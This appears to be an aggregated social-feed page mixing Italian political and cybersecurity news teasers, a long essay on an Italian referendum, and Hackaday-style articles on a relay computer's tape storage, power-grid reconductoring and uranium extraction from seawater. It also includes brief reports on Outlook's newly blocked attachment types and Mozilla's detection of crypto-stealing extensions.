Acn: a maggio recrudescenza dell’attività ransomware in Italia
@Informatica (Italy e non Italy 😁)
Con un incremento a doppia cifra rispetto alla media semestrale precedente, l’attività ransomware in Italia torna protagonista. Ecco i settori con più vittime e come mitigare il rischio
L'articolo Acn: a maggio recrudescenza dell’attività ransomware in Italia proviene da Cyber Security
Informatica (Italy e non Italy 😁) reshared this.
This Relay Computer Has Magnetic Tape Storage
Magnetic tape storage is something many of us will associate with 8-bit microcomputers or 1960s mainframe computers, but it still has a place in the modern data center for long-term backups. It’s likely not to be the first storage tech that would spring to mind when considering a relay computer, but that’s just what [DiPDoT] has done by giving his machine tape storage.
We like this hack, in particular because it’s synchronous. Where the cassette storage of old just had the data stream, this one uses both channels of a stereo cassette deck, one for clock and the other data. It’s encoded as a sequence of tones, which are amplified at playback (by a tube amp, of course) to drive a rectifier which fires the relay.
On the record side the tones are made by an Arduino, something which we fully understand but at the same time can’t help wondering whether something electromechanical could be used instead. Either way, it works well enough to fill a relay shift register with each byte, which can then be transferred to the memory. It’s detailed in a series of videos, the first of which we’ve paced below the break.
If you want more cassette tape goodness, while this may be the slowest, someone else is making a much faster cassette interface.
youtube.com/embed/3r_vtB9umZ4?…
Vorratsdatenspeicherung: Keine Begründung für überlange Speicherfrist von drei Monaten
Stefano Galieni*
Si parta dal fatto che il bicchiere referendario va visto come “mezzo pieno”. Che nell’afoso silenzio elettorale, nella melassa della distrazione di massa, nell’assenza quanto nell’indicazione da parte di alte cariche dello Stato a disertare le urne, che quasi 15 milioni di aventi diritto si rechino a votare su quesiti complessi, sovente spiegati male – a volte anche dagli stessi proponenti – è un risultato da cui partire e da non dimenticare, per innescare dinamiche più articolate attorno al rapporto fra democrazia e partecipazione. Dalle prime dichiarazioni del segretario nazionale della Cgil questo dato pare acquisito, così come sembra aver preso piede la necessità di riaprire un lavoro di inchiesta sul campo nel mondo articolato, variegato e complesso del mondo del lavoro, fatto di ascolto, di ricerca, di analisi, tanto nei singoli territori, con le loro complessità, quanto nei diversi comparti produttivi. Un impegno che non si può esaurire nei luoghi di lavoro – troppo spesso effimeri, frammentati, fondati sull’isolamento – ma che deve riconnettere l’intero tessuto sociale del Paese. Non si tratta di utilizzare termini idealisti quali “ottimismo” quanto di una verifica incontrovertibile dei risultati ottenuti laddove insieme ai referendum si votava per il primo turno delle elezioni amministrative (cfr Nuoro) o al ballottaggio (Taranto o Matera). In queste città il quorum referendario si è quasi sempre raggiunto o superato e i risultati hanno dato una netta prevalenza del si. Ogni dato ipotetico, legato ad un superamento generale del quorum va preso con le molle. Se è vero che la destra tende ad appropriarsi del blocco astensionista, questa non va imitata. Non bisogna credere o far credere a proiezioni arbitrarie dei risultati anche se, va detto, laddove nei ballottaggi hanno prevalso coalizioni di centro destra, sui referendum hanno vinto le posizioni dei promotori dei quesiti. C’è però un vulnus, profondo e dalla forte natura politica che va analizzato nelle sue diverse e complesse sfaccettature. I referendum che direttamente impattavano sul mondo del lavoro sono quelli che hanno ricevuto i maggiori consensi con i 12.249.649 voti, in percentuale l’89.6% dei votanti (contro il jobs act) e i 12.220.430, pari all’ 89,04 % sul terzo quesito, quello riguardante le maggior tutele per chi lavora nelle piccole imprese. Questo perché nel mondo produttivo nazionale, questo tessuto è divenuto prevalente. Il problema forte è nel divario fra i si ottenuti ai 4 referendum e quello erroneamente presentato come quesito su immigrazione e cittadinanza.
In realtà il quesito, che mirava a dimezzare i tempi necessari per poter chiedere (non per ottenere come erroneamente, a volte anche in buona fede ha sintetizzato qualcuno), ha ottenuto oltre 3.200 mila voti in meno rispetto agli altri e questo apre ad una necessaria e urgente riflessione politica che si dirama verso diverse direzioni. I 3 milioni e 200 mila che hanno votato no ad una proposta minimale di estensione dei diritti a loro colleghe e colleghi di lavoro, a studentesse e studenti, vanno cercati in ambiti diversi, tanto in base alle appartenenze politiche, quanto alla disinformazione dilagante, quanto ai territori in cui tale dissenso si è manifestato. Con questo approccio non si intende certo fare proposte per affrontare un tema vasto e complesso, ma si propone semplicemente di analizzarlo in maniera laica e basata su dati certi, non su ipotesi. Togliamo, almeno in parte, le elettrici e gli elettori del M5S a cui il movimento aveva lasciato “libertà di coscienza” pronunciandosi compiutamente solo sui primi quattro si. Non si può dimenticare la composizione di questa forza politica che unisce ad una posizione altamente progressista su tematiche come il lavoro e l’opposizione al riarmo, crepe significative rispetto ai diritti, in particolare sul tema dell’immigrazione. Hanno governato con Salvini, una parte di loro considera ancora le Ong come “taxi del mare” ed è difficile far comprendere ad un elettorato poco politicizzato, anzi dall’origine orientato all’antipolitica, la differenza che passa fra i richiedenti asilo e chi vive e lavora magari da decenni in questo assurdo Paese. In alcuni, non tutti, i casi, i vertici – al contrario di altre forze politiche – sono più avanzati della base e questo è un problema di cui tenere conto. C’è poi una piccola area, forse ancora poco rilevante in termini numerici ma capace di proporre forti argomentazioni di contrarietà all’estensione dei diritti e che, per necessità di sintesi, proviamo a definire come i sostenitori italiani dell’approccio BSW di Sahra Wagenknecht. Si tratta di un’area di “sinistra nazionalista” secondo cui le forze comuniste (per loro neoliberiste) hanno da troppo tempo dimenticato il proletariato nazionale in nome di valori e di una società cosmopolita. Lavoratori (non è il caso che utilizzino spesso il termine al maschile), che, sentendosi abbandonati e vedendo i colleghi immigrati come concorrenti al ribasso nei salari, li percepiscono come “nemici”. Un approccio da sinistra conservatrice che però, in un contesto come quello italiano, più impoverito di quello tedesco, può trovare spazio e costituire cultura di se. Peccato che l’impoverimento del Paese non sia certo dovuto alla presenza, peraltro non competitiva di lavoratrici e lavoratori stranieri quanto all’assenza di una sana conflittualità per il miglioramento delle condizioni salariali, per un welfare da ricostruire, per servizi da estendere e non da considerare privilegi per chi, magari individualmente, li ha ottenuti.
Un’altra componente in cui ha prevalso la diffidenza vede insieme problemi di classe e generazionali. Ci si riferisce ad una marea di persone, sovente pensionate, con basso reddito e la cui informazione è basata sul livello infimo dei canali televisivi. Per questi il cambiamento sociale epocale dovuto all’immigrazione è da decenni – anche grazie a politiche di governo di diverso orientamento, complici o vigliacche – sinonimo di sconvolgimento, di paura, di insicurezza perché i volti che si incontrano sono considerati ancora sconosciuti e minacciosi. Tale paura, che secondo la narrazione tossica televisiva modello Rete 4 è generalizzante, nell’esperienza personale è rivolta principalmente contro quelle e quelli che vengono percepiti come poveri e, in quanto tali, concorrenti alla spartizione delle poche briciole lasciate da un welfare a pezzi. L’impressione, ancora da misurare con rilevazioni più accurate, è che laddove prevale un elettorato giovane e colto, spesso universitario, il divario delle opinioni sui diversi quesiti, si assottiglia molto. Resta, sia ben chiaro, ma c’è un segnale che contrasta invece con una ricerca basata su quanto accade nei territori. Nelle grandi città il si alla riforma della legge sulla cittadinanza ha avuto risultati migliori rispetto alle piccole province, significativo il divario fra un Nord più restio – pesa ancora l’influenza leghista – e un sud, in cui si è votato di meno ma dove la percentuale dei favorevoli al quinto referendum è stata maggiore. Non da ultimo, ad una prima analisi, si conferma anche un altro forte divario fra i risultati nei seggi ubicati nelle periferie e quelli in zone più borghesi.
Ad una lettura che si fermi alla fotografia del presente, i risultati sembrano confermare le tesi del BSW, che colgono la contraddizione fra un ceto medio progressista, più teso a difendere i “diritti civili” di chi non ha il problema di mettere insieme il pranzo con la cena, ed un proletariato / sottoproletariato, privo di strumenti di tutela e privo persino di quella consapevolezza di diritto alla rivolta verso le classi dominanti. E ci siamo infine arrivati, questi risultati si dimostrano questione politica da affrontare. O le soggettività politiche e sindacali si assumono la responsabilità di operare per una concreta ricomposizione di classe che passi attraverso lotte comuni, formazione, ricostruzione di una egemonia culturale in grado di ridare una spiegazione materiale e ideologica al presente o si è condannati a subire quella dell’avversario di classe.
Secondo alcune / i, questo referendum non andava fatto, secondo il parere di altre / i è stato impostato su valori di carattere liberale – come spesso capita sulle questioni inerenti diritti civili – non comunicandone la sua specificità all’interno di una complessità di classe. Chi scrive pensa che entrambe le reazioni siano inadeguate. Il referendum era necessario a seguito di totale inadempienza delle forze politiche presenti in parlamento che, o per opposizione ad ogni miglioramento di una legge razzista come la 91/1992 o per il timore di perdere consensi, non è mai stata seriamente messa in discussione. Solo una partecipazione popolare poteva riproporre meglio tale tema nell’agenda politica del Paese e questo in parte, certamente insufficiente, è avvenuto. Sulla seconda critica il ragionamento che va fatto è più articolato, spettava ai settori di classe organizzati e più avanzati, presentarlo nei luoghi critici come elemento di ricomposizione di classe ma spettava anche al ceto medio “illuminato” valorizzare il fatto che questo non era un “referendum sull’immigrazione” ma un primo tentativo per fare i conti con un Paese che è cambiato nel profondo nella propria composizione sociale.
Ora diventa necessario non disperdere quel consenso che comunque si è accumulato per farlo crescere, magari con un percorso più visibile, per ottenere non piccoli miglioramenti legislativi o accettare le proposte al ribasso come lo “ius scholae” già rilanciato da Forza Italia, ma modifiche molto più sostanziali. Bisogna puntare in alto partendo da alcuni elementi, questi si profondamente di classe. In Italia le questioni sociali sono divenute divisive quando scientemente si è scelto di separarle. Si pensi alle cd politiche inclusive per i rom, per i rifugiati, per i senza fissa dimora, per le persone con disagio psichico. Va invece reimposto di affrontare i problemi che attanagliano la vita di chi ha meno diritti o meno opportunità, riportandoli ad un carattere di universalismo. Serve edilizia popolare? Il solo modo per evitare che un quartiere di una periferia si mobiliti in maniera aggressiva perché legittimamente è stato dato un alloggio pubblico ad una famiglia “straniera” è quello di aumentare il numero di alloggi per edilizia pubblica, facendo conoscere bene i criteri di graduatoria. Lo stesso ragionamento va fatto per i presidi sanitari, per i posti negli asili nido, per tutti quei bisogni primari in cui la concorrenza fra ultimi e penultimi è determinata in realtà dal fatto che entrambi non sono garantiti dai poteri dominanti. Questo tipo di intervento che è sociale, economico, ma persino pedagogico, non va lasciato all’improvvisazione ma deve vedere come protagonisti tanto lo Stato, le regioni, i Comuni e gli enti pubblici di prossimità, quanto i corpi intermedi di cui questo Paese ha estremo bisogno, partiti, sindacati, mondo associativo eccetera. E riguardando un cambiamento sociale in atto da decenni ed irrefrenabile, deve vedere come protagoniste/i anche quelle forze vive, nate e/o cresciute in Italia che potrebbero svolgere un ruolo propulsivo.
Si tratta di coesione sociale che deve poter comprendere quante più persone possibili e attraverso cui va declinato, da “sinistra” il termine sicurezza, alibi attraverso cui da decenni si consumano le peggiori nefandezze.
Dovremmo insomma produrre un programma più ambizioso per il futuro, capace di modificare radicalmente le gerarchie dell’agenda politica e di quella, conseguente, dei media mainstream. Fino a quando si continuerà unicamente a difendersi con termini compassionevoli, che si richiamano ad un’etica che risulta inutile nella giungla della competizione individuale, saremo – molto probabilmente e quando va bene – in grado di ottenere soltanto la riduzione del danno. Invece dobbiamo volere “il pane e le rose” ad esempio costruendo quelle relazioni per cui la parola “cittadinanza”, da concessione individuale per alcune/i, riassuma il suo significato originale di appartenenza ad una comunità aperta e capace di guardare in avanti. Occorre un lavoro lungo, di tutte e di tutti, in cui il passaggio referendario va visto, con le sue contraddizioni, come un primo risultato da non rinnegare.
P.S. i referendum hanno risentito sicuramente anche, come già detto, di una scarsa quando non distorta informazione. A chi scrive è capitato, almeno un paio di volte, di partecipare in orari improbabili, a tribune referendarie televisive. Nel backstage, prima della diretta, gli esponenti della maggioranza dialogavano mostrando di comprendere quanto la presenza soprattutto di giovani immigrate/i non fosse stata mai seriamente affrontata, parlavano di urgenza di dialogo. Ma non appena le telecamere si accendevano, gli stessi si scatenavano affermando che i promotori volevano regalare la cittadinanza a clandestini, delinquenti, stupratori e, chi più ne ha più ne metta, seguendo un trito copione di esaltazione del braccio forte e autorevole dell’attuale compagine governativa. Un triste show che va in onda ogni giorno a reti pressoché unificate e in cui il contraddittorio è spesso debole se non timido. Anche questo è un intervento da perseguire perché sul pensiero televisivo si formano ancora le opinioni delle persone. Ed anche questo è un terreno di scontro di classe.
*Transform Italia
Pensare in grande
Stefano Galieni* Si parta dal fatto che il bicchiere referendario va visto come “mezzo pieno”. Che nell’afoso silenzio elettorale, nella melRifondazione Comunista
Verfassungsschutzbericht: Alte Facebook-Linke statt junger TikTok-Nazis
ecco l'accordo: lui toglie i dazi e la cina continua a fornire terre rare (quelle in ucraina non sono terre rare)
ma non era così già dall'inizio, prima che trump trasformasse la credibilità degli usa in una barzelletta? ogni volta che lui fa uno dei suoi tira e molla come presidente usa e non come imprenditore qualcosa si rompe nello stato usa per non ricomporsi mai più... l'economia è così. pessimo uomo d'affari.
“Proteggere il futuro”, il nuovo libro di Luca Del Fabbro: una guida per governare il cambiamento
@Politica interna, europea e internazionale
È stato presentato oggi, 11 giugno 2025, a Roma, alla Camera dei deputati, “Proteggere il futuro”, il nuovo libro del Presidente di Iren Luca Dal Fabbro edito da Rubbettino. All’evento hanno partecipato, tra gli altri, Gilberto Pichetto Fratin, Renato Loiero
Politica interna, europea e internazionale reshared this.
Reconductoring: Building Tomorrow’s Grid Today
What happens when you build the largest machine in the world, but it’s still not big enough? That’s the situation the North American transmission system, the grid that connects power plants to substations and the distribution system, and which by some measures is the largest machine ever constructed, finds itself in right now. After more than a century of build-out, the towers and wires that stitch together a continent-sized grid aren’t up to the task they were designed for, and that’s a huge problem for a society with a seemingly insatiable need for more electricity.
There are plenty of reasons for this burgeoning demand, including the rapid growth of data centers to support AI and other cloud services and the move to wind and solar energy as the push to decarbonize the grid proceeds. The former introduces massive new loads to the grid with millions of hungry little GPUs, while the latter increases the supply side, as wind and solar plants are often located out of reach of existing transmission lines. Add in the anticipated expansion of the manufacturing base as industry seeks to re-home factories, and the scale of the potential problem only grows.
The bottom line to all this is that the grid needs to grow to support all this growth, and while there is often no other solution than building new transmission lines, that’s not always feasible. Even when it is, the process can take decades. What’s needed is a quick win, a way to increase the capacity of the existing infrastructure without having to build new lines from the ground up. That’s exactly what reconductoring promises, and the way it gets there presents some interesting engineering challenges and opportunities.
Bare Metal
Copper is probably the first material that comes to mind when thinking about electrical conductors. Copper is the best conductor of electricity after silver, it’s commonly available and relatively easy to extract, and it has all the physical characteristics, such as ductility and tensile strength, that make it easy to form into wire. Copper has become the go-to material for wiring residential and commercial structures, and even in industrial installations, copper wiring is a mainstay.
However, despite its advantages behind the meter, copper is rarely, if ever, used for overhead wiring in transmission and distribution systems. Instead, aluminum is favored for these systems, mainly due to its lower cost compared to the equivalent copper conductor. There’s also the factor of weight; copper is much denser than aluminum, so a transmission system built on copper wires would have to use much sturdier towers and poles to loft the wires. Copper is also much more subject to corrosion than aluminum, an important consideration for wires that will be exposed to the elements for decades.ACSR (left) has a seven-strand steel core surrounded by 26 aluminum conductors in two layers. ACCC has three layers of trapezoidal wire wrapped around a composite carbon fiber core. Note the vastly denser packing ratio in the ACCC. Source: Dave Bryant, CC BY-SA 3.0.
Aluminum has its downsides, of course. Pure aluminum is only about 61% as conductive as copper, meaning that conductors need to have a larger circular area to carry the same amount of current as a copper cable. Aluminum also has only about half the tensile strength of copper, which would seem to be a problem for wires strung between poles or towers under a lot of tension. However, the greater diameter of aluminum conductors tends to make up for that lack of strength, as does the fact that most aluminum conductors in the transmission system are of composite construction.
The vast majority of the wires in the North American transmission system are composites of aluminum and steel known as ACSR, or aluminum conductor steel-reinforced. ACSR is made by wrapping high-purity aluminum wires around a core of galvanized steel wires. The core can be a single steel wire, but more commonly it’s made from seven strands, six wrapped around a single central wire; especially large ACSR might have a 19-wire core. The core wires are classified by their tensile strength and the thickness of their zinc coating, which determines how corrosion-resistant the core will be.
In standard ACSR, both the steel core and the aluminum outer strands are round in cross-section. Each layer of the cable is twisted in the opposite direction from the previous layer. Alternating the twist of each layer ensures that the finished cable doesn’t have a tendency to coil and kink during installation. In North America, all ACSR is constructed so that the outside layer has a right-hand lay.
ACSR is manufactured by machines called spinning or stranding machines, which have large cylindrical bodies that can carry up to 36 spools of aluminum wire. The wires are fed from the spools into circular spinning plates that collate the wires and spin them around the steel core fed through the center of the machine. The output of one spinning frame can be spooled up as finished ACSR or, if more layers are needed, can pass directly into another spinning frame for another layer of aluminum, in the opposite direction, of course.
youtube.com/embed/TVdOpiER8Xc?…
Fiber to the Core
While ACSR is the backbone of the grid, it’s not the only show in town. There’s an entire beastiary of initialisms based on the materials and methods used to build composite cables. ACSS, or aluminum conductor steel-supported, is similar to ACSR but uses more steel in the core and is completely supported by the steel, as opposed to ACSR where the load is split between the steel and the aluminum. AAAC, or all-aluminum alloy conductor, has no steel in it at all, instead relying on high-strength aluminum alloys for the necessary tensile strength. AAAC has the advantage of being very lightweight as well as being much more resistant to core corrosion than ACSR.
Another approach to reducing core corrosion for aluminum-clad conductors is to switch to composite cores. These are known by various trade names, such as ACCC (aluminum conductor composite core) or ACCR (aluminum conductor composite reinforced). In general, these cables are known as HTLS, which stands for high-temperature, low-sag. They deliver on these twin promises by replacing the traditional steel core with a composite material such as carbon fiber, or in the case of ACCR, a fiber-reinforced metal matrix.
The point of composite cores is to provide the conductor with the necessary tensile strength and lower thermal expansion coefficient, so that heating due to loading and environmental conditions causes the cable to sag less. Controlling sag is critical to cable capacity; the less likely a cable is to sag when heated, the more load it can carry. Additionally, composite cores can have a smaller cross-sectional area than a steel core with the same tensile strength, leaving room for more aluminum in the outer layers while maintaining the same overall conductor diameter. And of course, more aluminum means these advanced conductors can carry more current.
Another way to increase the capacity in advanced conductors is by switching to trapezoidal wires. Traditional ACSR with round wires in the core and conductor layers has a significant amount of dielectric space trapped within the conductor, which contributes nothing to the cable’s current-carrying capacity. Filling those internal voids with aluminum is accomplished by wrapping round composite cores with aluminum wires that have a trapezoidal cross-section to pack tightly against each other. This greatly reduces the dielectric space trapped within a conductor, increasing its ampacity within the same overall diameter.
Unfortunately, trapezoidal aluminum conductors are much harder to manufacture than traditional round wires. While creating the trapezoids isn’t that much harder than drawing round aluminum wire — it really just requires switching to a different die — dealing with non-round wire is more of a challenge. Care must be taken not to twist the wire while it’s being rolled onto its spools, as well as when wrapping the wire onto the core. Also, the different layers of aluminum in the cable require different trapezoidal shapes, lest dielectric voids be introduced. The twist of the different layers of aluminum has to be controlled, too, just as with round wires. Trapezoidal wires can also complicate things for linemen in the field in terms of splicing and terminating cables, although most utilities and cable construction companies have invested in specialized tooling for advanced conductors.
Same Towers, Better Wires
The grid is what it is today in large part because of decisions made a hundred or more years ago, many of which had little to do with engineering. Power plants were located where it made sense to build them relative to the cities and towns they would serve and the availability of the fuel that would power them, while the transmission lines that move bulk power were built where it was possible to obtain rights-of-way. These decisions shaped the physical footprint of the grid, and except in cases where enough forethought was employed to secure rights-of-way generous enough to allow for expansion of the physical plant, that footprint is pretty much what engineers have to work with today.
Increasing the amount of power that can be moved within that limited footprint is what reconductoring is all about. Generally, reconductoring is pretty much what it sounds like: replacing the conductors on existing support structures with advanced conductors. There are certainly cases where reconductoring alone won’t do, such as when new solar or wind plants are built without existing transmission lines to connect them to the system. In those cases, little can be done except to build a new transmission line. And even where reconductoring can be done, it’s not cheap; it can cost 20% more per mile than building new towers on new rights-of-way. But reconductoring is much, much faster than building new lines. A typical reconductoring project can be completed in 18 to 36 months, as compared to the 5 to 15 years needed to build a new line, thanks to all the regulatory and legal challenges involved in obtaining the property to build the structures on. Reconductoring usually faces fewer of these challenges, since rights-of-way on existing lines were established long ago.
The exact methods of reconductoring depend on the specifics of the transmission line, but in general, reconductoring starts with a thorough engineering evaluation of the support structures. Since most advanced conductors are the same weight per unit length as the ACSR they’ll be replacing, loads on the towers should be about the same. But it’s prudent to make sure, and a field inspection of the towers on the line is needed to make sure they’re up to snuff. A careful analysis of the design capacity of the new line is also performed before the project goes through the permitting process. Reconductoring is generally performed on de-energized lines, which means loads have to be temporarily shifted to other lines, requiring careful coordination between utilities and transmission operators.
Once the preliminaries are in place, work begins. Despite how it may appear, most transmission lines are not one long cable per phase that spans dozens of towers across the countryside. Rather, most lines span just a few towers before dead-ending into insulators that use jumpers to carry current across to the next span of cable. This makes reconductoring largely a tower-by-tower affair, which somewhat simplifies the process, especially in terms of maintaining the tension on the towers while the conductors are swapped. Portable tensioning machines are used for that job, as well as for setting the proper tension in the new cable, which determines the sag for that span.
The tooling and methods used to connect advanced conductors to fixtures like midline splices or dead-end adapters are similar to those used for traditional ACSR construction, with allowances made for the switch to composite cores from steel. Hydraulic crimping tools do most of the work of forming a solid mechanical connection between the fixture and the core, and then to the outer aluminum conductors. A collet is also inserted over the core before it’s crimped, to provide additional mechanical strength against pullout.
youtube.com/embed/QD7_7t4SeVY?…
Is all this extra work to manufacture and deploy advanced conductors worth it? In most cases, the answer is a resounding “Yes.” Advanced conductors can often carry twice the current as traditional ACSR or ACCC conductors of the same diameter. To take things even further, advanced AECC, or aluminum-encapsulated carbon core conductors, which use pretensioned carbon fiber cores covered by trapezoidal annealed aluminum conductors, can often triple the ampacity of equivalent-diameter ACSR.
Doubling or trebling the capacity of a line without the need to obtain new rights-of-way or build new structures is a huge win, even when the additional expense is factored in. And given that an estimated 98% of the existing transmission lines in North America are candidates for reconductoring, you can expect to see a lot of activity under your local power lines in the years to come.
Siti di viaggio italiani insicuri: serve più cultura della sicurezza nel turismo online
@Informatica (Italy e non Italy 😁)
Quasi la metà dei principali siti di viaggio italiani lascia i clienti esposti alle frodi via email. Ecco come mitigare il rischio in un settore che, a livello globale, registra una crescita del 26,4% tra il 2024 e il 2032
L'articolo
Informatica (Italy e non Italy 😁) reshared this.
Spese militari al 5% del Pil. La Nato valuta di conteggiare anche gli aiuti all’Ucraina
@Notizie dall'Italia e dal mondo
In vista del vertice dell’Aia di fine mese, la Nato sta valutando una modifica significativa alla metrica della spesa dei membri, per includere i finanziamenti e gli aiuti militari destinati all’Ucraina nel computo del nuovo obiettivo di spesa che verrà stabilito durante il Summit. È quanto
Notizie dall'Italia e dal mondo reshared this.
Aggiornamenti Microsoft giugno 2025: corretta una zero day già sfruttata in rete
@Informatica (Italy e non Italy 😁)
Microsoft ha rilasciato gli aggiornamenti mensili con il Patch Tuesday di giugno 2025 che impatta su 67 nuove vulnerabilità: tra queste anche due zero-day, di cui una che risulta essere già attivamente sfruttata in rete. Ecco tutti i dettagli e i
Informatica (Italy e non Italy 😁) reshared this.
“Proteggere il futuro”: un estratto del nuovo libro di Luca Del Fabbro
@Politica interna, europea e internazionale
Pubblichiamo un estratto di “Proteggere il futuro”, il nuovo libro del Presidente di Iren Luca Dal Fabbro edito da Rubbettino. Il volume, introdotto dalla prefazione dell’Ambasciatore Giampiero Massolo, si propone di affrontare in modo analitico i temi cruciali della sicurezza
Politica interna, europea e internazionale reshared this.
Con Scale AI Meta supererà OpenAI, Anthropic e Google nell’IA?
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Mark Zuckerberg sarebbe frustrato dal fatto che concorrenti come OpenAI, Anthropic e Google sembrano essere più avanti nei modelli di intelligenza artificiale e per tentare la rimonta investirà circa 15 miliardi
Informatica (Italy e non Italy 😁) reshared this.
Microsoft blocca nuovi allegati su Outlook! Stop ai file usati dagli hacker nelle email di Phishing
Il mese prossimo, Outlook Web e il nuovo Outlook per Windows amplieranno l’elenco degli allegati bloccati, ha annunciato Microsoft. A partire da luglio 2025, Outlook bloccherà i file .library-ms e .search-ms.
“Nell’ambito dei nostri continui sforzi per migliorare la sicurezza di Outlook Web e del nuovo Outlook per Windows, stiamo aggiornando l’elenco dei tipi di file bloccati predefiniti in OwaMailboxPolicy. A partire dall’inizio di luglio 2025, i tipi di file [.library-ms e .search-ms] verranno aggiunti all’elenco BlockedFileTypes”, ha scritto l’azienda.
I file .library-ms (in Windows definiscono librerie che combinano cartelle locali e remote in un’unica visualizzazione di Explorer) sono stati utilizzati negli attacchi di phishing dall’inizio del 2025. Tali file sono stati utilizzati per attaccare organizzazioni governative e aziende private e sfruttare la vulnerabilità CVE-2025-24054, che espone gli hash NTLM.
Il gestore URI del protocollo search-ms è stato utilizzato dai phisher almeno da giugno 2022, quando Matthew Hickey, co-fondatore di Hacker House e ricercatore di sicurezza, ha scoperto che poteva usare search-ms e il problema CVE-2022-30190 per avviare automaticamente le finestre di ricerca di Windows sui dispositivi dei destinatari, inducendoli a eseguire malware.
“I nuovi tipi di file bloccati vengono utilizzati raramente, quindi la maggior parte delle organizzazioni non sarà interessata da questa modifica. Tuttavia, se gli utenti inviano o ricevono questi allegati, non saranno più in grado di aprirli o scaricarli in Outlook Web o nel nuovo Outlook per Windows”, avverte Microsoft.
“Se l’organizzazione non utilizza questi tipi di file, non è necessario intraprendere alcuna azione. L’aggiornamento verrà applicato automaticamente a tutti i criteri cassetta postale di OWA. Tuttavia, se è necessario consentire questi tipi di file, è possibile includerli in AllowedFileTypes in OwaMailboxPolicy prima di distribuire l’aggiornamento”. Per un elenco completo degli allegati attualmente bloccati in Outlook, consultare la documentazione Microsoft.
Ricordiamo che Microsoft ha una lunga storia di rimozione e disabilitazione di diverse funzionalità di Office e Windows che vengono utilizzate impropriamente dagli hacker. Ad esempio, nel 2018, l’azienda ha ampliato il supporto di Antimalware Scan Interface (AMSI) per le applicazioni client di Office 365 per bloccare gli attacchi che utilizzano macro VBA.
Da allora, l’azienda ha iniziato a bloccare le macro VBA per impostazione predefinita, ha disabilitato le macro di Excel 4.0 (XLM), ha introdotto la protezione per le macro XLM e ha iniziato a bloccare i componenti aggiuntivi XLL non attendibili per impostazione predefinita in tutti i tenant di Microsoft 365.
Inoltre, a maggio dell’anno scorso, Microsoft ha annunciato la dismissione di VBScript e ad aprile 2025 ha annunciato la disattivazione di tutti i controlli ActiveX nelle versioni Windows delle applicazioni Microsoft 365 e Office 2024.
L'articolo Microsoft blocca nuovi allegati su Outlook! Stop ai file usati dagli hacker nelle email di Phishing proviene da il blog della sicurezza informatica.
Simon Perry likes this.
Tutti i piani di Nvidia per la Germania e il Regno Unito
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Nvidia costruirà un supercomputer ad alte prestazioni in Germania; intanto, l'amministratore delegato Jensen Huang loda l'investimento del Regno Unito per aumentare le capacità di calcolo per l'intelligenza artificiale. L'azienda americana si è
Informatica (Italy e non Italy 😁) reshared this.
Un missile che cambia le carte in tavola? Kyiv svela l’Hrim-2
@Notizie dall'Italia e dal mondo
Le capacità di attacchi a lunga distanza di Kyiv sembrano essere giunte ad un punto di svolta. Lo scorso 6 giugno è stato infatti svelato un nuovo missile balistico sviluppato domesticamente, il quale sarebbe stato testato sul campo nel mese di maggio, quando è stato utilizzato per colpire con
Notizie dall'Italia e dal mondo reshared this.
All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world
Privacy International investigated eight of the most popular period-tracking apps to analyse how they function and process users’ reproductive health data. Their findings raised concerns for users’ privacy, given the sensitive nature of the health data involved. These findings come within the context of the global roll back on reproductive rights and fears over law enforcement forcing apps to hand over data.
The post All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world appeared first on European Digital Rights (EDRi).
reshared this
LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime
European Parliament's LIBE committee vote on a reform of the Europol Regulation was a mixed bag. Although it was a blow to the European Commission's original proposal, it still legitimised an expanding surveillance regime thanks to Europol's ever-growing power and resources. Read the Protect Not Surveil coalition’s statement.
The post LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime appeared first on European Digital Rights (EDRi).
reshared this
Bipolar Uranium Extraction from Seawater with Ultra-Low Cell Voltage
As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.
Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO2 deposited on the cathode and U3O8 on the anode.
Among the reported performance statistics of this prototype are the ability to extract UO22+ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl– ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.
The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.
Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox
Mozilla ha sviluppato una nuova funzionalità di sicurezza che aiuterà a bloccare le estensioni dannose di Firefox che rubano criptovalute agli utenti. Gli sviluppatori segnalano che il nuovo sistema crea profili di rischio per ogni estensione del portafoglio presentata nello store e avvisa automaticamente dei rischi se viene raggiunta una soglia specificata.
Questi avvisi hanno lo scopo di incoraggiare le persone che esaminano i componenti aggiuntivi a esaminarli più attentamente e a rimuovere quelli dannosi dallo store prima che vengano utilizzati per svuotare i portafogli crittografici degli utenti.
“Per proteggere gli utenti di Firefox, il team Add-ons Operations ha sviluppato un sistema di pre-rilevamento progettato per identificare e bloccare le estensioni fraudolente per criptovalute prima che cadano nelle mani di utenti ignari”, afferma il team. “Il primo livello di protezione prevede indicatori automatici che determinano il profilo di rischio delle estensioni per wallet elencate su addons.mozilla.org.
